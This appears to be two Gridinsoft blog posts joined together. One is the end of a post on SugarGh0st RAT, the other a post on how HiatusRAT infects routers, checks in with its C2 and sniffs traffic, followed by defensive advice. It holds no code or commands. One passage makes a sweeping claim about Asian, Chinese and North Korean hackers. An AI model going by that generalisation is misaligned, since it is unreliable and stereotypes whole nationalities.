SugarGh0st retains the core functionalities of its predecessor but features customized reconnaissance capabilities and a modified communication protocol. The malware granted threat actors total remote control to pillage confidential data from infected networks. Enhancements include:

• expanded anti-detection tactics
• reconnaissance commands tailored to harvest documents and credentials
• new communications disguising C2 servers as Google Drive domains

Attacks on government entities, particularly embassies and ministries, is not a new phenomenon. Countries spied on each other all the time, and the tools were the only difference. While other countries do not expose their software, Asian government-sponsored hackers seem to not be ashamed of their software. And Chinese and North Korean hackers appear to be among the most public ones.

The post SugarGh0st RAT Targets Uzbekistan and South Korea appeared first on Gridinsoft Blog.

US DoD and Taiwan Companies Cyberattacks

First, let’s clear out the attacks upon quite famed organisations and companies. The long-going cyberattack upon Taiwanese companies and at least one government organisation was detected as early as in August 2023. Lumen researchers who studied the botnet established by the HiatusRAT in the past noticed a new flow of connections that comes from Taiwan IP address zones. Soon after, =cyberattacks on chemical production facilities, semiconductor manufacturers and one municipality were uncovered.

The story around the U.S. Department of Defence is a bit different. Same research group detected traffic coming to the IP addresses associated with the botnet not only from Taiwan but also from the US. Specifically, they discovered that crooks who stand behind the RAT used one of its Tier 2 servers to connect to the DoD server dedicated to work with defence contracts. Fortunately, no deep penetration happened here, and hackers were most probably performing reconnaissance before further actions.

HiatusRAT Analysis

First thing that comes into view when you check the Hiatus is its network architecture. Instead of infecting endpoints, it targets networking devices – at least it was doing so since its emergence in late 2021. Routers are gateways for humongous amounts of information – and having complete control over it may sometimes give you much more than hacking the computers in the network. Though, nothing stops Hiatus from delivering additional payloads to the target systems. Aside from sniffing, such a network of compromised routers can also serve as a network of proxy servers that conceal the real IP address from the target server.

To spread the payload, hackers seek business-grade network routers with vulnerable firmware installed. Firstlings of the botnet were amongst Draytek routers, specifically Vigor 2960 and 3900. Nowadays, malware has builds capable of infecting routers with chipsets based on Arm, i386, x86-64 and MIPS/MIPS64 architectures. This sets up quite a large number of devices, as network infrastructure firmware updates are implemented even more reluctantly than patches to regular software.

Execution flow

The attack chain that enables the RAT injection into the router is not clear even nowadays. Though it is clear that upon gaining initial access, attackers execute a batch script that downloads the payload and an auxiliary utility. The latter is a specific version of a tcpdump, a command-line tool that allows for packet analysis.

Upon execution, the first thing to do for HiatusRAT is kicking out other processes that may be listening to the same 8816 port. If there are any, malware jams one first and proceeds with normal launching. Then, a kind-of-classic step comes: malware gathers basic information about the device it has started on. Among such data is information about its MAC address, architecture, firmware and kernel versions. It also gets precise information about the file system and all files that can potentially be stored in the internal memory.

Once malware is done with these checks, it reads a tiny JSON that contains what appears to be malware config. There, malware retrieves a C2 servers address. Aside from the “main” server, there is one used to receive all the packages gathered with the modified tcpdump tool. The first request to the control server is a classic HTTP POST that contains several fields, with basic system info gathered the step before.

HiatusRAT Functionality

I’ve already mentioned the tcpdump-like tool that supplies a significant part of the RAT functionality. However, it does not stop at this point. Hiatus can receive different commands from the command server, which alter its functionality or even force the malware to melt down. Thing is, some of these functions were not used to the moment, despite being available since the first release of the malware back in 2021.

How to protect against network infrastructure attacks?

Well, Hiatus used to aim at routers with some specific architecture and series, but now it covers quite a bit of possible variants. The ways hackers use to deploy this malware are still unclear, so there are not many reactive measures to figure out. Instead, I have several proactive advice for you to stick to.

Use advanced network protection solutions. Well, antivirus programs are not greatly effective at preventing this RAT infection. Meanwhile, network protection solutions, especially ones that are designed to bear on heuristics, can effectively detect and dispatch the intruder just by its behaviour. Network Detection and Response systems, conjoined with SOAR and UBA solutions, can show excellent results at protecting the environment against tricky malware attacks.

Update (or upgrade) your networking devices regularly. Since the key point of the malware injection is vulnerable router firmware, it is essential to keep it updated. Keep an eye on malware attacks that were executed with or via vulnerabilities in networking devices. Usually, device manufacturers release updates in a matter of weeks. Though, there could be unfortunate cases when some really old devices reach end-of-life and are not supported in any form. In this case, you are out for device updating – this is the best and most definite way to get rid of the hazard.

Keep a well-done anti-malware software on hand. I’ve just said that anti-malware programs are not very effective in this case, and I say it is nice to have – so inconsistent of me, isn’t it? The answer is no, as anti-malware programs will serve as a preventive mechanism for malware that HiatusRAT can deliver through its functionality. Multi-layer security structures are always harder to penetrate, at least without triggering the alarm.

The post HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military appeared first on Gridinsoft Blog.